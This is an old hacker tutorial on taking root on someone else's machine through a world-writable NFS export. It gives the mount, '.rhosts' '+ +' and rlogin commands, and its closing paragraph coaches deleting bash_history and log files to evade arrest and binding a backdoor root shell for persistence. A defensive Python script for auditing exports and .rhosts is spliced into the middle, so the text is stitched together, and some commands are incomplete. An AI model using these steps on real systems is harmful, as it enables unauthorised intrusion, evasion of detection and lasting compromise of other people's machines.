NFS Export Root Exploit

NFS Export Root

So you found a web site with the NFS export set as / (everybody), did ya?
Well, on this site I will teach you how to gain root from that NFS
export. It's quite simple really.


1. You need root on a box, preferably your own.
2. Somewhat of a brain; not really, though, this is easy.

Type the following:

# mount /mnt
# cd /mnt
# echo "+ +" > .rhosts
# rlogin -l root

Voila, you now have root on the host. Silly admins!
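
The two conditions this trick relies on can be audited from the admin's
side: an export open to everybody that is writable, leaves remote root
unsquashed or covers /, and a .rhosts file holding a "+ +" wildcard entry.
The script below is an added example, not part of the original text; it
assumes Linux exports(5) option names, and its function names and sample
data are constructed for illustration.

```python
import re

# Constructed samples, not taken from the original page.
SAMPLE_EXPORTS = """\
/            *(rw,no_root_squash)
/home        192.168.1.0/24(rw,root_squash)
/srv/pub     (ro)
/data        trusted.example.com(rw) *(ro)
"""
SAMPLE_RHOSTS = "+ +\nbuildhost alice\n"

WILDCARD_CLIENTS = {"", "*", "0.0.0.0/0", "::/0"}  # "" = options with no client

def audit_exports(text):
    """Flag world-reachable exports that are also writable, unsquashed or '/'."""
    findings = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()   # drop comments, split on blanks
        if not fields:
            continue
        path, specs = fields[0], fields[1:] or [""]
        for spec in specs:
            # Each spec is client(opt,opt,...); either part may be missing.
            m = re.fullmatch(r"([^()]*)(?:\(([^)]*)\))?", spec)
            if m is None or m.group(1) not in WILDCARD_CLIENTS:
                continue
            opts = set((m.group(2) or "").split(","))
            reasons = [label for flag, label in (
                ("rw" in opts, "writable"),
                ("no_root_squash" in opts, "remote root not squashed"),
                (path == "/", "whole filesystem exported"),
            ) if flag]
            if reasons:
                findings.append((path, m.group(1) or "*", reasons))
    return findings

def audit_rhosts(text):
    """Return 1-based line numbers of entries using a '+' wildcard host or user."""
    return [n for n, line in enumerate(text.splitlines(), 1)
            if "+" in line.split()[:2]]

if __name__ == "__main__":
    for path, client, reasons in audit_exports(SAMPLE_EXPORTS):
        print(f"EXPORT {path} -> {client}: {', '.join(reasons)}")
    for n in audit_rhosts(SAMPLE_RHOSTS):
        print(f".rhosts line {n}: wildcard trust entry")
```

Run it against the real /etc/exports and each home directory's .rhosts by
passing the file contents to the two functions in place of the samples.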


When you are root you should take the proper precautions so you aren't
logged and arrested. I won't tell you how to do things like delete the
bash_history file *hint* and the files in /log that contain your info,
but you should really know what you're doing when you are rooting someone's
box. Also, when you are root you should make sure you can obtain root on
the box even if the admin fixed the initial error/hole. A simple way to do
this is to bind a root shell to a certain port you specify using a backdoor.
If you have any questions e-mail me at


